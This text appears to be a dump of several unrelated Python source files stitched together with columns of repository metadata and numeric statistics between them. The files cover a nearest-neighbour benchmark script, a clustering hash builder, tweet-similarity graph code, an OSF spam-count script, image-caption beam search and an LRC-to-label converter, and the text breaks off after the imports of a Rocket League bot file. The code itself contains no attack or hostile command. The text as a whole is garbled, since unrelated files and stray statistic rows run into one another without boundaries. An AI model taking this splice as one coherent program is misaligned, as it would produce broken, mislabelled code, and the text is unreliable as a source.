download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
with tarfile.open("datasets/sift.tar.gz") as t:
t.extractall(path="datasets")
subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
results_fn = get_fn('results', args)
queries_fn = get_fn('queries', args)
logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
if not os.path.exists(queries_fn):
queries = get_queries(args)
with open(queries_fn, 'wb') as f:
pickle.dump(queries, f)
else:
queries = pickle.load(open(queries_fn, 'rb'))
logging.info('got {0} queries'.format(len(queries)))
algos = {
'annoy': [ Annoy('angular', n_trees, search_k)
for n_trees in [10, 50, 100]
for search_k in [ 7, 3000, 50000, 200000, 500000]
],
'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
for M, ef_con in [ (12, 100)]
for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
],
'nmslib': []}
MsPostsEfs = [
({'M': 12,
'post': 0,
'indexThreadQty': args.n_threads,
'delaunay_type': 2,
'efConstruction': 100,
},
[1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
),
]
for oneCase in MsPostsEfs:
for ef in oneCase[1]:
params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
algos['nmslib'].append(
NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
algos_flat = []
if args.algo:
print('running only: %s' % str(args.algo))
algos = {args.algo: algos[args.algo]}
for library in algos.keys():
for algo in algos[library]:
algos_flat.append((library, algo))
random.shuffle(algos_flat)
logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
for library, algo in algos_flat:
logging.info(algo.name)
# Spawn a subprocess to force the memory to be reclaimed at the end
p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
p.start()
p.join()
| 37.602222
| 166
| 0.61929
| 2,345
| 16,921
| 4.282303
| 0.183369
| 0.027783
| 0.020713
| 0.013444
| 0.251643
| 0.193487
| 0.141207
| 0.108445
| 0.095399
| 0.078371
| 0
| 0.020641
| 0.249867
| 16,921
| 449
| 167
| 37.685969
| 0.770503
| 0.069499
| 0
| 0.192308
| 0
| 0.008242
| 0.129106
| 0.026165
| 0
| 0
| 0
| 0
| 0.005495
| 1
| 0.054945
| false
| 0
| 0.068681
| 0.010989
| 0.164835
| 0.008242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c51be6bea74f985c0302d56a6e42f0067e94f0f
| 4,287
|
py
|
Python
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | 1
|
2021-12-14T10:19:55.000Z
|
2021-12-14T10:19:55.000Z
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
"""{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: a level_xx_hash.json hash written to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing

import numpy as np


def main():
    #
    # user-defined vars
    #
    clustering_levels_to_consider = [12]

    # consider different cluster granularities, i.e., snip level from leaf
    for clustering_level in clustering_levels_to_consider:
        # load the linkage matrix
        sav_linkages = "heirarchical_clustering/linkage_matrix.pkl"
        with open(sav_linkages, "rb") as f:
            z: np.ndarray = pkl.load(f)

        # load the list of tokens (which corresponds to the linkage matrix),
        # i.e., i in tokens[i] corresponds to cluster i referenced in z[:, 0:2]
        sav_tokens = "heirarchical_clustering/tokens.json"
        with open(sav_tokens, "rb") as f:
            tokens: list = json.load(f)

        # see the link below on interpreting z, i.e., each row holds
        # (cluster_index1, cluster_index2, dist, cluster size):
        # https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.html
        clusters: typing.Generator = gen_clusters(
            level=clustering_level, z=z, tokens=tokens
        )  # generator of (cluster_index, list of tokens) of each cluster for the current cut 'level'

        # build a hash to translate token to cluster index for the given granularity
        h: dict = {
            token: cluster_index
            for cluster_index, cluster in clusters
            for token in cluster
        }

        # save
        sav = f"cluster_hashes/level_{clustering_level}_hash.json"
        os.makedirs(os.path.dirname(sav), exist_ok=True)
        with open(sav, "w") as f:
            json.dump(h, f, indent=4)


def gen_clusters(level: int = 1, *, z: np.ndarray, tokens: list) -> typing.Generator:
    """Return a generator of (cluster_index, list of tokens) of each cluster
    for the current cut 'level'.
    """
    # add an 'operation index' column to z
    x: np.ndarray = np.hstack(
        (z, np.array([i for i in range(z.shape[0])]).reshape(-1, 1))
    )
    # note: cluster_index = x[:, 4] + len(tokens) is the index of the cluster
    # created by the operation; cluster indices 0 to len(tokens) - 1 correspond
    # to the individual tokens
    #
    # iterate over each cut level (from leaves) until at the specified 'level'
    # and collect z_rows_of_interest, an iterable of z row indices representing
    # the clusters wrt. cut 'level'
    #
    seen_z_rows = []  # all z row clusters seen in previous levels
    seen_cluster_indices = [index for index, token in enumerate(tokens)]
    for i in range(1, level + 1):  # i.e., cluster 1 to level
        x_dropped: np.ndarray = np.delete(
            x, seen_z_rows, axis=0
        )  # i.e., drop clusters seen at a previous level
        x_i: np.ndarray = x_dropped[
            [row.all() for row in np.isin(x_dropped[:, 0:2], seen_cluster_indices)]
        ]  # the part of x that lists the clusters in the current cut level, i.e., those clusters that reference only previously seen cluster_indices
        z_rows_of_interest: np.ndarray = x_i[:, 4].astype(int)
        seen_z_rows += [row for row in z_rows_of_interest]
        seen_cluster_indices += [z_row + len(tokens) for z_row in x_i[:, 4]]
    # generate a (cluster_index, list of tokens) for each cluster of the current cut 'level'
    for row in z_rows_of_interest:
        cluster_index = int(x[row, 4]) + len(
            tokens
        )  # i.e., the 'true' cluster index: z row index + len(tokens)
        yield (
            cluster_index,
            cluster_index_to_tokens(cluster_index, z=z, tokens=tokens),
        )


def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
    """Return the list of tokens belonging to a cluster index (as per z[:, 0:2] values)."""
    if cluster_index < len(tokens):
        return [tokens[cluster_index]]
    else:
        c1, c2 = z[cluster_index - len(tokens), 0:2].astype(int)
        return cluster_index_to_tokens(
            c1, z=z, tokens=tokens
        ) + cluster_index_to_tokens(c2, z=z, tokens=tokens)
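
# Minimal worked example (hand-built values, not part of the pipeline): for
# tokens ['a', 'b', 'c'] and a linkage matrix whose row 0 merges leaf clusters
# 0 and 1 (distance 0.5, size 2), the merged cluster gets index
# len(tokens) + 0 = 3, and cluster_index_to_tokens recovers its members:
def _demo_cluster_index_to_tokens():
    demo_tokens = ["a", "b", "c"]
    demo_z = np.array([[0.0, 1.0, 0.5, 2.0]])
    assert cluster_index_to_tokens(3, z=demo_z, tokens=demo_tokens) == ["a", "b"]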

if __name__ == "__main__":
    main()
| 37.278261
| 148
| 0.648239
| 629
| 4,287
| 4.265501
| 0.254372
| 0.089452
| 0.022363
| 0.020872
| 0.116288
| 0.092434
| 0.06858
| 0.051435
| 0.051435
| 0.051435
| 0
| 0.010284
| 0.251458
| 4,287
| 114
| 149
| 37.605263
| 0.825802
| 0.405878
| 0
| 0
| 0
| 0
| 0.055667
| 0.050461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34
| 7,444
|
py
|
Python
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-05-20T20:53:19.000Z
|
2021-05-20T20:53:19.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-04-06T08:34:05.000Z
|
2021-11-24T10:47:27.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | null | null | null |
import sys

import networkx as nx
from simhash import Simhash, SimhashIndex  # used by reveal_hidden_links_simhash below
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# if there is a problem with gensim and Word2Vec, check that the python
# version is 2.7
# print('Hello from {}'.format(sys.version))


# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
    """
    Function to calculate the TF-IDF vectors for all tweets/contents and then
    calculate the cosine similarity for all pairs. It returns the graph with
    edges added between similar tweet-nodes, i.e. wherever the cosine
    similarity for a pair of tweet-nodes is above the threshold.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        cids (list): The list with the tweet ids from the tweet-nodes of the
            graph.
        contents (list): The list with the preprocessed content from the tweet-
            nodes. Indexing is the same as in the 'cids' list.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added in the graph
            between these nodes.
    Returns:
        The enriched graph instance (networkx.Graph()), after revealing the
        hidden edges between similar tweet-nodes.
    """
    try:
        tfidf = TfidfVectorizer(norm='l2', max_features=1000)
        tf_idf_matrix = tfidf.fit_transform(contents)
        pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
        cos_matrix = pairwise_similarity.A
        tsize = len(contents)
        for i in range(0, tsize):
            for j in range(i + 1, tsize):
                # similarity score is in [-1, 1]
                sim_score = cos_matrix[i][j]
                if sim_score > threshold:
                    # reveal hidden edge (between similar tweet-nodes)
                    G.add_edge(cids[i], cids[j], edgetype='similarTo')
    except Exception:
        # swallow vectorization errors (e.g. an empty vocabulary) and return
        # the graph unchanged
        pass
    return G


# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
    """
    Function to reveal hidden similarity edges between tweet-nodes based only
    on TF-IDF vectors and a cosine similarity threshold.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        content_dict (dict): The dict with the tweet ids from the tweet-nodes
            of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added in the graph
            between these nodes.
    Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
    """
    # materialize as lists so reveal_similar_links can index cids[i]
    cids = list(content_dict.keys())
    contents = list(content_dict.values())
    return reveal_similar_links(G, cids, contents, threshold)


# Creates w-shingles for SimHash
def get_shingles(sentence, n):
    """
    Function to create the overlapping character shingles (n-grams) of a
    sentence, which SimHash then fingerprints.
    Args:
        sentence (str): The sentence (preprocessed text from a tweet-node),
            from which the shingles will be created.
        n (int): The size of the shingle. In this case, the size is always set
            to be three, meaning that all substrings of three consecutive
            characters will be created.
    Returns:
        A list with all character n-grams of the sentence.
    """
    s = sentence.lower()
    return [s[i:i + n] for i in range(max(len(s) - n + 1, 1))]
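# Shingling sketch (illustrative input, not from the original repo):
# get_shingles("hello", 3) -> ['hel', 'ell', 'llo']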
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
    """
    Function to reveal hidden similarity edges between tweet-nodes based on
    SimHash, an LSH approximation on TF-IDF vectors, and a cosine similarity
    threshold.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        content_dict (dict): The dict with the tweet ids from the tweet-nodes
            of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added in the graph
            between these nodes.
    Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
    """
    objs = []
    for cid, content in content_dict.items():
        objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
    index = SimhashIndex(objs, f=1, k=2)
    for key in index.bucket:
        bucket_item = index.bucket[key]
        contents = []
        cids = []
        for item in bucket_item:
            newid = str(item.split(',')[-1])
            contents.append(content_dict[newid])
            cids.append(newid)
        G = reveal_similar_links(G, cids, contents, threshold)
    return G


# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
    """
    Function to reveal hidden similarity edges between tweet-nodes based on
    Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
    specifically, for each word in a tweet, we add the 'k' most similar words
    according to the pre-trained Word2Vec model.
    Note: If you need to speed up the code during experimentation, it is better
    to calculate the Word2Vec enriched text once and cache it.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        content_dict (dict): The dict with the tweet ids from the tweet-nodes
            of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added in the graph
            between these nodes.
        model (gensim.models.KeyedVectors()): Google's pre-trained
            Word2Vec model.
        k (int): The number of similar words to add.
    Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
    """
    contents = list(content_dict.values())
    cids = list(content_dict.keys())
    enriched_contents = []
    for c in contents:
        words = c.split(' ')
        enriched_list = []
        for w in words:
            try:
                w2v_sim_list = model.most_similar(w, topn=k)
                sim_words = [str(t[0]) for t in w2v_sim_list]
                enriched_list.append(' '.join(sim_words) + ' ' + w)
            except Exception:
                # word not in the Word2Vec vocabulary: keep it unenriched
                enriched_list.append(w)
        if len(enriched_list) > 0:
            enriched_contents.append(' '.join(enriched_list))
    return reveal_similar_links(G, cids, enriched_contents, threshold)
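# Usage sketch (the graph setup and threshold are assumptions; the calling
# script is not part of this file):
# import networkx as nx
# G = nx.Graph()
# G.add_nodes_from(content_dict)  # tweet ids as nodes
# G = reveal_hidden_links_tfidf(G, content_dict, threshold=0.5)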
| 35.113208
| 79
| 0.657308
| 1,009
| 7,444
| 4.777007
| 0.197225
| 0.033195
| 0.041494
| 0.017635
| 0.509129
| 0.503112
| 0.495851
| 0.470954
| 0.462448
| 0.45166
| 0
| 0.005916
| 0.273375
| 7,444
| 211
| 80
| 35.279621
| 0.885191
| 0.615798
| 0
| 0.2
| 0
| 0
| 0.006459
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0.033333
| 0.066667
| 0
| 0.233333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c57f29eb95c40842b9781c30c39516ef8329161
| 1,285
|
py
|
Python
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
import sys
import csv
import logging
import datetime

from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils

logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)


def main():
    dry_run = '--dry' in sys.argv
    if not dry_run:
        script_utils.add_file_logger(logger, __file__)
    nodes_excluding_spam = Node.objects.filter(is_deleted=False, created__gte=datetime.datetime(2018, 3, 14)).exclude(spam_status__in=[SpamStatus.SPAM, SpamStatus.FLAGGED])
    # The extra statement here is to round down the datetimes so we can count by dates only
    data = nodes_excluding_spam.extra({'date_created': 'date(created)'}).values('date_created').annotate(count=Count('id')).order_by('date_created')
    with open('spamless_node_count_through_2018_3_14.csv', mode='w') as csv_file:
        fieldnames = ['date_created', 'count']
        writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
        if not dry_run:
            writer.writeheader()
            for data_point in data:
                writer.writerow(data_point)
        logger.info('Writing csv data for {} dates'.format(data.count()))


if __name__ == '__main__':
    main()
| 32.125
| 173
| 0.721401
| 179
| 1,285
| 4.899441
| 0.486034
| 0.062714
| 0.018244
| 0.025086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01317
| 0.172763
| 1,285
| 39
| 174
| 32.948718
| 0.811853
| 0.066148
| 0
| 0.074074
| 0
| 0
| 0.126878
| 0.034224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.296296
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c595afdb533a0fc9550d6782a8298265522f096
| 8,299
|
py
|
Python
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | 3
|
2021-04-12T02:23:18.000Z
|
2022-01-06T12:05:24.000Z
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
# note: scipy.misc.imread/imresize were removed in SciPy 1.3, so this file
# expects an older SciPy
from scipy.misc import imread, imresize

device = torch.device("cpu")


def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
    """
    Reads an image and captions it with beam search.
    Input:
    :param encoder: encoder model
    :param decoder: decoder model
    :param image_path: path to image
    :param word_map: word map (word to index mapping)
    :param beam_size: number of sequences to consider at each decode-step
    Output:
    :return: caption, weights for visualization
    """
    k = beam_size
    vocab_size = len(word_map)

    ## Read image and process
    img = imread(image_path)
    if len(img.shape) == 2:
        img = img[:, :, np.newaxis]
        img = np.concatenate([img, img, img], axis=2)
    img = imresize(img, (256, 256))
    img = img.transpose(2, 0, 1)
    img = img / 255.
    img = torch.FloatTensor(img).to(device)
    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                     std=[0.229, 0.224, 0.225])
    transform = transforms.Compose([normalize])
    image = transform(img)  # (3, 256, 256)

    # Encode
    # (1, 3, 256, 256)
    image = image.unsqueeze(0)
    # (1, enc_image_size, enc_image_size, encoder_dim)
    # (1, 14, 14, 2048)
    encoder_out = encoder(image)
    enc_image_size = encoder_out.size(1)
    encoder_dim = encoder_out.size(3)

    # Flatten encoding
    # (1, num_pixels, encoder_dim)
    # (1, 196, 2048)
    encoder_out = encoder_out.view(1, -1, encoder_dim)
    num_pixels = encoder_out.size(1)

    # We'll treat the problem as having a batch size of k
    # (k, num_pixels, encoder_dim)
    encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)

    # Tensor to store top k previous words at each step; now they're just <start>
    k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device)  # (k, 1)
    # Tensor to store top k sequences; now they're just <start>
    # (k, 1)
    seqs = k_prev_words
    # Tensor to store top k sequences' scores; now they're just 0
    top_k_scores = torch.zeros(k, 1).to(device)  # (k, 1)
    # Tensor to store top k sequences' alphas; now they're just 1s
    # (k, 1, enc_image_size, enc_image_size)
    seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)

    # Lists to store completed sequences, their alphas and scores
    complete_seqs = list()
    complete_seqs_alpha = list()
    complete_seqs_scores = list()

    # Start decoding
    step = 1
    h, c = decoder.init_hidden_state(encoder_out)

    # s is a number less than or equal to k,
    # because sequences are removed from this process once they hit <end>
    while True:
        # (s, embed_dim)
        embeddings = decoder.embedding(k_prev_words).squeeze(1)
        # (s, encoder_dim), (s, num_pixels)
        awe, alpha = decoder.attention(encoder_out, h)
        # (s, enc_image_size, enc_image_size)
        alpha = alpha.view(-1, enc_image_size, enc_image_size)
        # gating scalar, (s, encoder_dim)
        gate = decoder.sigmoid(decoder.f_beta(h))
        awe = gate * awe
        # (s, decoder_dim)
        h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
        # (s, vocab_size)
        scores = decoder.fc(h)
        scores = F.log_softmax(scores, dim=1)
        # Add
        scores = top_k_scores.expand_as(scores) + scores  # (s, vocab_size)
        # For the first step, all k points will have the same scores (since same k previous words, h, c)
        if step == 1:
            top_k_scores, top_k_words = scores[0].topk(k, 0, True, True)  # (s)
        else:
            # Unroll and find top scores, and their unrolled indices
            top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True)  # (s)
        # print(top_k_words)
        # Convert unrolled indices to actual indices of scores
        prev_word_inds = top_k_words // vocab_size  # (s)
        next_word_inds = top_k_words % vocab_size  # (s)
        # print(seqs[prev_word_inds])
        # Add new words to sequences, alphas
        seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1)  # (s, step+1)
        seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
                               dim=1)  # (s, step+1, enc_image_size, enc_image_size)
        # Which sequences are incomplete (didn't reach <end>)?
        incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
                           next_word != word_map['<end>']]
        ## will be empty if none of them have reached <end>
        complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
        # Set aside complete sequences
        if len(complete_inds) > 0:
            complete_seqs.extend(seqs[complete_inds].tolist())
            complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
            complete_seqs_scores.extend(top_k_scores[complete_inds])
            k -= len(complete_inds)  # reduce beam length accordingly
        # Proceed with incomplete sequences
        if k == 0:
            break
        seqs = seqs[incomplete_inds]
        seqs_alpha = seqs_alpha[incomplete_inds]
        ### updating h's and c's for incomplete sequences
        h = h[prev_word_inds[incomplete_inds]]
        c = c[prev_word_inds[incomplete_inds]]
        encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
        top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
        k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
        # Break if things have been going on too long
        if step > 40:
            break
        step += 1
    # print(complete_seqs)
    i = complete_seqs_scores.index(max(complete_seqs_scores))
    seq = complete_seqs[i]
    alphas = complete_seqs_alpha[i]
    return seq, alphas
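
# Usage sketch (checkpoint loading and file names are assumptions, not part
# of this file):
# checkpoint = torch.load('BEST_checkpoint.pth.tar', map_location=device)
# encoder, decoder = checkpoint['encoder'].eval(), checkpoint['decoder'].eval()
# with open('wordmap.json') as f:
#     word_map = json.load(f)
# seq, alphas = caption_image(encoder, decoder, 'img.jpg', word_map, beam_size=5)
# rev_word_map = {v: k for k, v in word_map.items()}
# print(' '.join(rev_word_map[ind] for ind in seq))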
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
#     """
#     Visualizes caption with weights at every word.
#     Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
#     :param image_path: path to image
#     :param seq: generated caption
#     :param alphas: attention weights for every time step
#     :param rev_word_map: reverse word mapping, i.e. ix2word
#     :param smooth: smooth weights?
#     """
#     image = Image.open(image_path)
#     image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
#     words = [rev_word_map[ind] for ind in seq]
#     figures = []
#     for t in range(len(words)):
#         fig = plt.figure()
#         if t > 50:
#             break
#         # plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
#         fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
#         plt.imshow(image)
#         current_alpha = alphas[t, :]
#         if smooth:
#             alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
#         else:
#             alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
#         if t == 0:
#             plt.imshow(alpha, alpha=0)
#         else:
#             plt.imshow(alpha, alpha=0.8)
#         plt.set_cmap(cm.Greys_r)
#         plt.axis('off')
#         figures.append(fig)
#         # plt.savefig("horse_riding/" + words[t] + str(t) + '.png', bbox_inches='tight', pad_inches=0)
#     plt.show()
| 32.291829
| 121
| 0.616821
| 1,146
| 8,299
| 4.293194
| 0.270506
| 0.013008
| 0.031707
| 0.018293
| 0.159553
| 0.108943
| 0.084959
| 0.047561
| 0.026016
| 0.014634
| 0
| 0.024151
| 0.276539
| 8,299
| 257
| 122
| 32.291829
| 0.795303
| 0.410049
| 0
| 0.020202
| 0
| 0
| 0.003158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010101
| false
| 0
| 0.242424
| 0
| 0.262626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5b1d85968d78e7d6653a282357a7d53ef86e80
| 623
|
py
|
Python
|
auxiliary-scripts/LRC-to-Label.py
|
xbnstudios/show-scripts
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | 1
|
2018-03-08T16:00:31.000Z
|
2018-03-08T16:00:31.000Z
|
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
import glob

for file in glob.glob("*.lrc"):
    filename = file[0:7]  # assume fnt-xxx.lrc file format
    lrc_file = open(file, encoding="utf-8")
    lrc_lines = lrc_file.readlines()
    lrc_file.close()
    label = open(filename + '.txt', 'w', encoding="utf-8")
    print(filename)
    for line in lrc_lines[3:]:
        time = line[line.find("[") + 1:line.find("]")].replace('.', ':').split(':')
        labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
        title = line.split(']', 1)[1].rstrip('\n')
        label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
    label.close()
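# Conversion sketch: an LRC line '[01:23.45]Chorus' parses to
# time == ['01', '23', '45'], so labeltime == str(1 * 60 + 23) + '.' + '45' + '0000'
# == '83.450000', producing the Audacity label line '83.450000 83.450000 Chorus'.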
| 31.15
| 82
| 0.552167
| 85
| 623
| 3.988235
| 0.482353
| 0.082596
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035052
| 0.221509
| 623
| 19
| 83
| 32.789474
| 0.663918
| 0.048154
| 0
| 0
| 0
| 0
| 0.062606
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5b46fd9008363f42f8cbdbddac0fafdcddf679
| 2,750
|
py
|
Python
|
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
import math

from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket

from driving.drive import drive_to_target
